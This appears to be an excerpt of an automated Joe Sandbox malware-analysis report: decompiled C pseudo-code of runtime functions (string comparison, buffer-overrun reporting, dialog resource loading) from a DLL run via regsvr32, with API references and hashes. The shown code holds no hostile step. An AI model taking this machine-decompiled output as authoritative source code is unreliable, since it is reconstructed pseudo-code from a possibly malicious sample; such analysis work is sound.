                                                                                                            										break;
                                                                                                            									} else {
                                                                                                            										_t54 = _t54;
                                                                                                            										if(_t54 == 0) {
                                                                                                            											goto L21;
                                                                                                            										} else {
                                                                                                            											if(_t54 !=  *((intOrPtr*)(_t76 + 3))) {
                                                                                                            												break;
                                                                                                            											} else {
                                                                                                            												_t76 = _t76 + 4;
                                                                                                            												_t81 = _t81 + 4;
                                                                                                            												if(_t54 != 0) {
                                                                                                            													continue;
                                                                                                            												} else {
                                                                                                            													goto L21;
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						goto L32;
                                                                                                            					}
                                                                                                            					L22:
                                                                                                            					asm("sbb eax, eax");
                                                                                                            					return (_t54 << 1) + 1;
                                                                                                            				}
                                                                                                            				L32:
                                                                                                            			}
















                                                                                                            0x10016d14
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016d16
                                                                                                            0x10016d18
                                                                                                            0x10016d40
                                                                                                            0x10016d42
                                                                                                            0x10016d1a
                                                                                                            0x10016d1d
                                                                                                            0x00000000
                                                                                                            0x10016d1f
                                                                                                            0x10016d1f
                                                                                                            0x10016d21
                                                                                                            0x00000000
                                                                                                            0x10016d23
                                                                                                            0x10016d23
                                                                                                            0x10016d29
                                                                                                            0x00000000
                                                                                                            0x10016d2b
                                                                                                            0x10016d2b
                                                                                                            0x10016d2d
                                                                                                            0x00000000
                                                                                                            0x10016d2f
                                                                                                            0x10016d32
                                                                                                            0x00000000
                                                                                                            0x10016d34
                                                                                                            0x10016d34
                                                                                                            0x10016d37
                                                                                                            0x10016d3c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016d3c
                                                                                                            0x10016d32
                                                                                                            0x10016d2d
                                                                                                            0x10016d29
                                                                                                            0x10016d21
                                                                                                            0x10016d1d
                                                                                                            0x00000000
                                                                                                            0x10016d18
                                                                                                            0x10016d44
                                                                                                            0x10016d44
                                                                                                            0x10016d4b
                                                                                                            0x10016d4b
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,10042558,00000118,10011796,00000001,00000000,10041D50,00000008,10016B00,00000000,00000000,00000000), ref: 10016C2B
                                                                                                            • _strlen.LIBCMT ref: 10016C51
                                                                                                            • _strlen.LIBCMT ref: 10016C62
                                                                                                            • _strncpy.LIBCMT ref: 10016C7C
                                                                                                            • _strlen.LIBCMT ref: 10016C85
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _strlen$FileModuleName_strncpy
                                                                                                            • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                                                            • API String ID: 2455649890-1673886896
                                                                                                            • Opcode ID: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
                                                                                                            • Instruction ID: 88295e5d41c60b50e9a3e58cda1e4c53c685b81e948abb858cf034152a287b35
                                                                                                            • Opcode Fuzzy Hash: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
                                                                                                            • Instruction Fuzzy Hash: 6731B476A052146BDB15DB60CC82FDE36B8EF05214F600169F514EF142DB38EBD18BA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E1001C425(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				intOrPtr _t94;
                                                                                                            				int _t95;
                                                                                                            				int _t98;
                                                                                                            				short* _t106;
                                                                                                            				int _t109;
                                                                                                            				short* _t111;
                                                                                                            				short* _t118;
                                                                                                            				short* _t119;
                                                                                                            				short* _t126;
                                                                                                            				char* _t132;
                                                                                                            				char* _t133;
                                                                                                            				long _t139;
                                                                                                            				int _t141;
                                                                                                            				int _t142;
                                                                                                            				int _t143;
                                                                                                            				int _t144;
                                                                                                            				char _t154;
                                                                                                            				char _t156;
                                                                                                            				short* _t159;
                                                                                                            				short* _t160;
                                                                                                            				short* _t162;
                                                                                                            				int _t165;
                                                                                                            				void* _t166;
                                                                                                            				void* _t167;
                                                                                                            				short* _t168;
                                                                                                            				void* _t173;
                                                                                                            
                                                                                                            				_push(0x40);
                                                                                                            				_push(0x10042fa0);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				_t94 =  *0x1004c470; // 0xf3933a06
                                                                                                            				 *((intOrPtr*)(_t167 - 0x1c)) = _t94;
                                                                                                            				_t162 = 0;
                                                                                                            				_t165 = 1;
                                                                                                            				_t173 =  *0x1004f8b0 - _t162; // 0x0
                                                                                                            				if(_t173 == 0) {
                                                                                                            					if(CompareStringW(0, 0, 0x10042704, 1, 0x10042704, 1) == 0) {
                                                                                                            						_t139 = GetLastError();
                                                                                                            						__eflags = _t139 - 0x78;
                                                                                                            						if(_t139 == 0x78) {
                                                                                                            							 *0x1004f8b0 = 2;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						 *0x1004f8b0 = 1;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if( *(_t167 + 0x14) > _t162) {
                                                                                                            					 *(_t167 + 0x14) = E1001C409( *(_t167 + 0x10),  *(_t167 + 0x14));
                                                                                                            				}
                                                                                                            				_t95 =  *(_t167 + 0x1c);
                                                                                                            				if(_t95 > _t162) {
                                                                                                            					_t95 = E1001C409( *(_t167 + 0x18), _t95);
                                                                                                            					 *(_t167 + 0x1c) = _t95;
                                                                                                            				}
                                                                                                            				_t144 =  *0x1004f8b0; // 0x0
                                                                                                            				_t141 = 2;
                                                                                                            				if(_t144 == _t141 || _t144 == _t162) {
                                                                                                            					 *(_t167 - 0x38) = _t162;
                                                                                                            					__eflags =  *(_t167 + 8) - _t162;
                                                                                                            					if( *(_t167 + 8) == _t162) {
                                                                                                            						_t109 =  *0x1004f724; // 0x0
                                                                                                            						 *(_t167 + 8) = _t109;
                                                                                                            					}
                                                                                                            					_t142 =  *(_t167 + 0x20);
                                                                                                            					__eflags = _t142 - _t162;
                                                                                                            					if(_t142 == _t162) {
                                                                                                            						_t142 =  *0x1004f734; // 0x0
                                                                                                            					}
                                                                                                            					_t166 = E1001A444(_t142,  *(_t167 + 8));
                                                                                                            					__eflags = _t166 - 0xffffffff;
                                                                                                            					if(_t166 != 0xffffffff) {
                                                                                                            						__eflags = _t166 - _t142;
                                                                                                            						if(__eflags == 0) {
                                                                                                            							L67:
                                                                                                            							_t165 = CompareStringA( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 + 0x10),  *(_t167 + 0x14),  *(_t167 + 0x18),  *(_t167 + 0x1c));
                                                                                                            							__eflags = _t162;
                                                                                                            							if(__eflags != 0) {
                                                                                                            								_push(_t162);
                                                                                                            								E100107C8(_t142, _t162, _t165, __eflags);
                                                                                                            								_push( *(_t167 - 0x38));
                                                                                                            								E100107C8(_t142, _t162, _t165, __eflags);
                                                                                                            							}
                                                                                                            							goto L69;
                                                                                                            						}
                                                                                                            						_push(0);
                                                                                                            						_push(0);
                                                                                                            						_push(_t167 + 0x14);
                                                                                                            						_push( *(_t167 + 0x10));
                                                                                                            						_push(_t166);
                                                                                                            						_push(_t142);
                                                                                                            						_t162 = E1001A487(_t142, _t162, _t166, __eflags);
                                                                                                            						__eflags = _t162;
                                                                                                            						if(__eflags == 0) {
                                                                                                            							goto L61;
                                                                                                            						}
                                                                                                            						_push(0);
                                                                                                            						_push(0);
                                                                                                            						_push(_t167 + 0x1c);
                                                                                                            						_push( *(_t167 + 0x18));
                                                                                                            						_push(_t166);
                                                                                                            						_push(_t142);
                                                                                                            						_t106 = E1001A487(_t142, _t162, _t166, __eflags);
                                                                                                            						 *(_t167 - 0x38) = _t106;
                                                                                                            						__eflags = _t106;
                                                                                                            						if(__eflags != 0) {
                                                                                                            							 *(_t167 + 0x10) = _t162;
                                                                                                            							 *(_t167 + 0x18) =  *(_t167 - 0x38);
                                                                                                            							goto L67;
                                                                                                            						}
                                                                                                            						_push(_t162);
                                                                                                            						E100107C8(_t142, _t162, _t166, __eflags);
                                                                                                            					}
                                                                                                            					goto L61;
                                                                                                            				} else {
                                                                                                            					if(_t144 != _t165) {
                                                                                                            						L61:
                                                                                                            						_t98 = 0;
                                                                                                            						L70:
                                                                                                            						return E1001254F(E100117AE(_t98,  *((intOrPtr*)(_t167 - 0x1c))));
                                                                                                            					}
                                                                                                            					 *(_t167 - 0x3c) = _t162;
                                                                                                            					 *(_t167 - 0x44) = _t162;
                                                                                                            					 *(_t167 - 0x40) = _t162;
                                                                                                            					if( *(_t167 + 0x20) == _t162) {
                                                                                                            						_t144 =  *0x1004f734; // 0x0
                                                                                                            						 *(_t167 + 0x20) = _t144;
                                                                                                            					}
                                                                                                            					if( *(_t167 + 0x14) == _t162 || _t95 == _t162) {
                                                                                                            						if( *(_t167 + 0x14) != _t95) {
                                                                                                            							__eflags = _t95 - _t165;
                                                                                                            							if(_t95 > _t165) {
                                                                                                            								L69:
                                                                                                            								_t98 = _t165;
                                                                                                            								goto L70;
                                                                                                            							}
                                                                                                            							__eflags =  *(_t167 + 0x14) - _t165;
                                                                                                            							if( *(_t167 + 0x14) <= _t165) {
                                                                                                            								_t111 = GetCPInfo( *(_t167 + 0x20), _t167 - 0x30);
                                                                                                            								__eflags = _t111;
                                                                                                            								if(_t111 == 0) {
                                                                                                            									goto L61;
                                                                                                            								}
                                                                                                            								__eflags =  *(_t167 + 0x14) - _t162;
                                                                                                            								if( *(_t167 + 0x14) <= _t162) {
                                                                                                            									__eflags =  *(_t167 + 0x1c) - _t162;
                                                                                                            									if( *(_t167 + 0x1c) <= _t162) {
                                                                                                            										goto L38;
                                                                                                            									}
                                                                                                            									__eflags =  *(_t167 - 0x30) - _t141;
                                                                                                            									if( *(_t167 - 0x30) < _t141) {
                                                                                                            										goto L69;
                                                                                                            									}
                                                                                                            									_t132 = _t167 - 0x2a;
                                                                                                            									__eflags =  *((char*)(_t167 - 0x2a));
                                                                                                            									if( *((char*)(_t167 - 0x2a)) == 0) {
                                                                                                            										goto L69;
                                                                                                            									} else {
                                                                                                            										goto L33;
                                                                                                            									}
                                                                                                            									while(1) {
                                                                                                            										L33:
                                                                                                            										_t159 =  *((intOrPtr*)(_t132 + 1));
                                                                                                            										__eflags = _t159;
                                                                                                            										if(_t159 == 0) {
                                                                                                            											goto L69;
                                                                                                            										}
                                                                                                            										_t154 =  *( *(_t167 + 0x18));
                                                                                                            										__eflags = _t154 -  *_t132;
                                                                                                            										if(_t154 <  *_t132) {
                                                                                                            											L36:
                                                                                                            											_t132 = _t132 + _t141;
                                                                                                            											__eflags =  *_t132;
                                                                                                            											if( *_t132 != 0) {
                                                                                                            												continue;
                                                                                                            											}
                                                                                                            											goto L69;
                                                                                                            										}
                                                                                                            										__eflags = _t154 - _t159;
                                                                                                            										if(_t154 <= _t159) {
                                                                                                            											goto L17;
                                                                                                            										}
                                                                                                            										goto L36;
                                                                                                            									}
                                                                                                            									goto L69;
                                                                                                            								}
                                                                                                            								__eflags =  *(_t167 - 0x30) - _t141;
                                                                                                            								if( *(_t167 - 0x30) < _t141) {
                                                                                                            									goto L20;
                                                                                                            								}
                                                                                                            								_t133 = _t167 - 0x2a;
                                                                                                            								__eflags =  *((char*)(_t167 - 0x2a));
                                                                                                            								if( *((char*)(_t167 - 0x2a)) == 0) {
                                                                                                            									goto L20;
                                                                                                            								} else {
                                                                                                            									goto L25;
                                                                                                            								}
                                                                                                            								while(1) {
                                                                                                            									L25:
                                                                                                            									_t160 =  *((intOrPtr*)(_t133 + 1));
                                                                                                            									__eflags = _t160;
                                                                                                            									if(_t160 == 0) {
                                                                                                            										goto L20;
                                                                                                            									}
                                                                                                            									_t156 =  *( *(_t167 + 0x10));
                                                                                                            									__eflags = _t156 -  *_t133;
                                                                                                            									if(_t156 <  *_t133) {
                                                                                                            										L28:
                                                                                                            										_t133 = _t133 + _t141;
                                                                                                            										__eflags =  *_t133;
                                                                                                            										if( *_t133 != 0) {
                                                                                                            											continue;
                                                                                                            										}
                                                                                                            										goto L20;
                                                                                                            									}
                                                                                                            									__eflags = _t156 - _t160;
                                                                                                            									if(_t156 <= _t160) {
                                                                                                            										goto L17;
                                                                                                            									}
                                                                                                            									goto L28;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L20:
                                                                                                            							_t98 = 3;
                                                                                                            							goto L70;
                                                                                                            						}
                                                                                                            						L17:
                                                                                                            						_t98 = _t141;
                                                                                                            						goto L70;
                                                                                                            					} else {
                                                                                                            						L38:
                                                                                                            						_t143 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x10),  *(_t167 + 0x14), _t162, _t162);
                                                                                                            						 *(_t167 - 0x48) = _t143;
                                                                                                            						__eflags = _t143 - _t162;
                                                                                                            						if(_t143 == _t162) {
                                                                                                            							goto L61;
                                                                                                            						}
                                                                                                            						 *(_t167 - 4) = _t162;
                                                                                                            						E10010B20(_t143 + _t143 + 0x00000003 & 0xfffffffc, _t144);
                                                                                                            						 *(_t167 - 0x18) = _t168;
                                                                                                            						 *(_t167 - 0x34) = _t168;
                                                                                                            						 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
                                                                                                            						_t118 =  *(_t167 - 0x34);
                                                                                                            						__eflags = _t118 - _t162;
                                                                                                            						if(_t118 != _t162) {
                                                                                                            							L43:
                                                                                                            							_t119 = MultiByteToWideChar( *(_t167 + 0x20), _t165,  *(_t167 + 0x10),  *(_t167 + 0x14), _t118, _t143);
                                                                                                            							__eflags = _t119;
                                                                                                            							if(_t119 == 0) {
                                                                                                            								L53:
                                                                                                            								__eflags =  *(_t167 - 0x3c);
                                                                                                            								if(__eflags != 0) {
                                                                                                            									_push( *(_t167 - 0x34));
                                                                                                            									E100107C8(_t143, _t162, _t165, __eflags);
                                                                                                            								}
                                                                                                            								_t98 =  *(_t167 - 0x40);
                                                                                                            								goto L70;
                                                                                                            							}
                                                                                                            							_t165 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x18),  *(_t167 + 0x1c), 0, 0);
                                                                                                            							 *(_t167 - 0x4c) = _t165;
                                                                                                            							__eflags = _t165;
                                                                                                            							if(_t165 == 0) {
                                                                                                            								goto L53;
                                                                                                            							}
                                                                                                            							 *(_t167 - 4) = 1;
                                                                                                            							E10010B20(_t165 + _t165 + 0x00000003 & 0xfffffffc, _t144);
                                                                                                            							 *(_t167 - 0x18) = _t168;
                                                                                                            							_t162 = _t168;
                                                                                                            							 *(_t167 - 0x50) = _t162;
                                                                                                            							 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
                                                                                                            							__eflags = _t162;
                                                                                                            							if(_t162 != 0) {
                                                                                                            								L49:
                                                                                                            								_t126 = MultiByteToWideChar( *(_t167 + 0x20), 1,  *(_t167 + 0x18),  *(_t167 + 0x1c), _t162, _t165);
                                                                                                            								__eflags = _t126;
                                                                                                            								if(_t126 != 0) {
                                                                                                            									 *(_t167 - 0x40) = CompareStringW( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 - 0x34), _t143, _t162, _t165);
                                                                                                            								}
                                                                                                            								__eflags =  *(_t167 - 0x44);
                                                                                                            								if(__eflags != 0) {
                                                                                                            									_push(_t162);
                                                                                                            									E100107C8(_t143, _t162, _t165, __eflags);
                                                                                                            								}
                                                                                                            								goto L53;
                                                                                                            							} else {
                                                                                                            								_t162 = E100107B6(_t165 + _t165);
                                                                                                            								__eflags = _t162;
                                                                                                            								if(_t162 == 0) {
                                                                                                            									goto L53;
                                                                                                            								}
                                                                                                            								 *(_t167 - 0x44) = 1;
                                                                                                            								goto L49;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t118 = E100107B6(_t143 + _t143);
                                                                                                            							_pop(_t144);
                                                                                                            							 *(_t167 - 0x34) = _t118;
                                                                                                            							__eflags = _t118 - _t162;
                                                                                                            							if(_t118 == _t162) {
                                                                                                            								goto L61;
                                                                                                            							}
                                                                                                            							 *(_t167 - 0x3c) = _t165;
                                                                                                            							goto L43;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}
                                                                                                            0x00000000
                                                                                                            0x1001c796
                                                                                                            0x1001c4f9
                                                                                                            0x1001c4fc
                                                                                                            0x1001c50d
                                                                                                            0x1001c513
                                                                                                            0x1001c515
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c51b
                                                                                                            0x1001c51e
                                                                                                            0x1001c54b
                                                                                                            0x1001c54e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c550
                                                                                                            0x1001c553
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c559
                                                                                                            0x1001c55c
                                                                                                            0x1001c560
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c566
                                                                                                            0x1001c566
                                                                                                            0x1001c566
                                                                                                            0x1001c569
                                                                                                            0x1001c56b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c574
                                                                                                            0x1001c576
                                                                                                            0x1001c578
                                                                                                            0x1001c582
                                                                                                            0x1001c582
                                                                                                            0x1001c584
                                                                                                            0x1001c587
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c589
                                                                                                            0x1001c57a
                                                                                                            0x1001c57c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c57c
                                                                                                            0x00000000
                                                                                                            0x1001c566
                                                                                                            0x1001c520
                                                                                                            0x1001c523
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c525
                                                                                                            0x1001c528
                                                                                                            0x1001c52c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c52e
                                                                                                            0x1001c52e
                                                                                                            0x1001c52e
                                                                                                            0x1001c531
                                                                                                            0x1001c533
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c538
                                                                                                            0x1001c53a
                                                                                                            0x1001c53c
                                                                                                            0x1001c542
                                                                                                            0x1001c542
                                                                                                            0x1001c544
                                                                                                            0x1001c547
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c549
                                                                                                            0x1001c53e
                                                                                                            0x1001c540
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c540
                                                                                                            0x1001c52e
                                                                                                            0x1001c4fe
                                                                                                            0x1001c500
                                                                                                            0x00000000
                                                                                                            0x1001c500
                                                                                                            0x1001c4ea
                                                                                                            0x1001c4ea
                                                                                                            0x00000000
                                                                                                            0x1001c58e
                                                                                                            0x1001c58e
                                                                                                            0x1001c5a1
                                                                                                            0x1001c5a3
                                                                                                            0x1001c5a6
                                                                                                            0x1001c5a8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c5ae
                                                                                                            0x1001c5ba
                                                                                                            0x1001c5bf
                                                                                                            0x1001c5c4
                                                                                                            0x1001c5c7
                                                                                                            0x1001c5e9
                                                                                                            0x1001c5ec
                                                                                                            0x1001c5ee
                                                                                                            0x1001c608
                                                                                                            0x1001c614
                                                                                                            0x1001c61a
                                                                                                            0x1001c61c
                                                                                                            0x1001c6d3
                                                                                                            0x1001c6d3
                                                                                                            0x1001c6d7
                                                                                                            0x1001c6d9
                                                                                                            0x1001c6dc
                                                                                                            0x1001c6e1
                                                                                                            0x1001c6e2
                                                                                                            0x00000000
                                                                                                            0x1001c6e2
                                                                                                            0x1001c637
                                                                                                            0x1001c639
                                                                                                            0x1001c63c
                                                                                                            0x1001c63e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c644
                                                                                                            0x1001c654
                                                                                                            0x1001c659
                                                                                                            0x1001c65c
                                                                                                            0x1001c65e
                                                                                                            0x1001c661
                                                                                                            0x1001c67f
                                                                                                            0x1001c681
                                                                                                            0x1001c69a
                                                                                                            0x1001c6a7
                                                                                                            0x1001c6ad
                                                                                                            0x1001c6af
                                                                                                            0x1001c6c3
                                                                                                            0x1001c6c3
                                                                                                            0x1001c6c6
                                                                                                            0x1001c6ca
                                                                                                            0x1001c6cc
                                                                                                            0x1001c6cd
                                                                                                            0x1001c6d2
                                                                                                            0x00000000
                                                                                                            0x1001c683
                                                                                                            0x1001c68d
                                                                                                            0x1001c68f
                                                                                                            0x1001c691
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c693
                                                                                                            0x00000000
                                                                                                            0x1001c693
                                                                                                            0x1001c5f0
                                                                                                            0x1001c5f4
                                                                                                            0x1001c5f9
                                                                                                            0x1001c5fa
                                                                                                            0x1001c5fd
                                                                                                            0x1001c5ff
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c605
                                                                                                            0x00000000
                                                                                                            0x1001c605
                                                                                                            0x1001c5ee
                                                                                                            0x1001c4db

                                                                                                            APIs
                                                                                                            • CompareStringW.KERNEL32(00000000,00000000,10042704,00000001,10042704,00000001,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?), ref: 1001C451
                                                                                                            • GetLastError.KERNEL32(?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC,10042CD0,00000018,10019429,10042CE0,00000008,10013474), ref: 1001C463
                                                                                                            • GetCPInfo.KERNEL32(00000000,00000000,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?,?,1001AE49,00000000,00000000), ref: 1001C50D
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C59B
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C614
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,100101C3,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C631
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,100101C3,?,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C6A7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1773772771-4125583295
                                                                                                            • Opcode ID: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
                                                                                                            • Instruction ID: f9a15a39c5567b5c4af314f3663c8d3c96b15f003a3eabc65cf21064ebdc607f
                                                                                                            • Opcode Fuzzy Hash: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
                                                                                                            • Instruction Fuzzy Hash: DCB1897690825EAFDF22CFA4DC95EAE7BF6EF05690F200119F840AA1A1D771D9D0CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 92%
                                                                                                            			E1001F2DE(intOrPtr* __ecx) {
                                                                                                            				signed int _t45;
                                                                                                            				void* _t49;
                                                                                                            				CHAR* _t50;
                                                                                                            				signed int _t54;
                                                                                                            				signed char _t60;
                                                                                                            				struct HWND__* _t62;
                                                                                                            				CHAR* _t63;
                                                                                                            				signed int _t68;
                                                                                                            				struct HINSTANCE__* _t81;
                                                                                                            				void* _t83;
                                                                                                            				intOrPtr* _t85;
                                                                                                            				void* _t87;
                                                                                                            				void* _t89;
                                                                                                            
                                                                                                            				E10011BF0(0x1003a3e8, _t87);
                                                                                                            				_t85 = __ecx;
                                                                                                            				_t68 =  *(__ecx + 0x5c);
                                                                                                            				 *((intOrPtr*)(_t87 - 0x10)) = _t89 - 0x18;
                                                                                                            				 *((intOrPtr*)(_t87 - 0x1c)) = __ecx;
                                                                                                            				 *(_t87 - 0x18) =  *(__ecx + 0x58);
                                                                                                            				_t45 = E100373B5();
                                                                                                            				_t81 =  *(_t45 + 0xc);
                                                                                                            				if( *(_t85 + 0x54) != 0) {
                                                                                                            					_t81 =  *(E100373B5() + 0xc);
                                                                                                            					_t45 = LoadResource(_t81, FindResourceA(_t81,  *(_t85 + 0x54), 5));
                                                                                                            					 *(_t87 - 0x18) = _t45;
                                                                                                            				}
                                                                                                            				if( *(_t87 - 0x18) != 0) {
                                                                                                            					_t45 = LockResource( *(_t87 - 0x18));
                                                                                                            					_t68 = _t45;
                                                                                                            				}
                                                                                                            				if(_t68 != 0) {
                                                                                                            					 *(_t87 - 0x14) = E1001EE1E(_t85);
                                                                                                            					E10022196();
                                                                                                            					 *(_t87 - 0x20) =  *(_t87 - 0x20) & 0x00000000;
                                                                                                            					__eflags =  *(_t87 - 0x14);
                                                                                                            					if( *(_t87 - 0x14) != 0) {
                                                                                                            						_t62 = GetDesktopWindow();
                                                                                                            						__eflags =  *(_t87 - 0x14) - _t62;
                                                                                                            						if( *(_t87 - 0x14) != _t62) {
                                                                                                            							_t63 = IsWindowEnabled( *(_t87 - 0x14));
                                                                                                            							__eflags = _t63;
                                                                                                            							if(_t63 != 0) {
                                                                                                            								EnableWindow( *(_t87 - 0x14), 0);
                                                                                                            								 *(_t87 - 0x20) = 1;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
                                                                                                            					_push(_t85);
                                                                                                            					E100237EE();
                                                                                                            					_t49 = E100220EE(_t87,  *(_t87 - 0x14));
                                                                                                            					_push(_t81);
                                                                                                            					_push(_t49);
                                                                                                            					_push(_t68);
                                                                                                            					_t50 = E1001F0D1(_t85);
                                                                                                            					__eflags = _t50;
                                                                                                            					if(_t50 != 0) {
                                                                                                            						__eflags =  *(_t85 + 0x38) & 0x00000010;
                                                                                                            						if(( *(_t85 + 0x38) & 0x00000010) != 0) {
                                                                                                            							_t83 = 4;
                                                                                                            							_t60 = E100202AB(_t85);
                                                                                                            							__eflags = _t60 & 0x00000001;
                                                                                                            							if((_t60 & 0x00000001) != 0) {
                                                                                                            								_t83 = 5;
                                                                                                            							}
                                                                                                            							E10021B92(_t85, _t83);
                                                                                                            						}
                                                                                                            						__eflags =  *(_t85 + 0x1c);
                                                                                                            						if( *(_t85 + 0x1c) != 0) {
                                                                                                            							E100204FE(_t85, 0, 0, 0, 0, 0, 0x97);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
                                                                                                            					__eflags =  *(_t87 - 0x20);
                                                                                                            					if( *(_t87 - 0x20) != 0) {
                                                                                                            						EnableWindow( *(_t87 - 0x14), 1);
                                                                                                            					}
                                                                                                            					__eflags =  *(_t87 - 0x14);
                                                                                                            					if(__eflags != 0) {
                                                                                                            						__eflags = GetActiveWindow() -  *(_t85 + 0x1c);
                                                                                                            						if(__eflags == 0) {
                                                                                                            							SetActiveWindow( *(_t87 - 0x14));
                                                                                                            						}
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)( *_t85 + 0x60))();
                                                                                                            					E1001EE58(_t85, __eflags);
                                                                                                            					__eflags =  *(_t85 + 0x54);
                                                                                                            					if( *(_t85 + 0x54) != 0) {
                                                                                                            						FreeResource( *(_t87 - 0x18));
                                                                                                            					}
                                                                                                            					_t54 =  *(_t85 + 0x40);
                                                                                                            				} else {
                                                                                                            					_t54 = _t45 | 0xffffffff;
                                                                                                            				}
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
                                                                                                            				return _t54;
                                                                                                            			}

















                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1001F2E3
                                                                                                            • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F31B
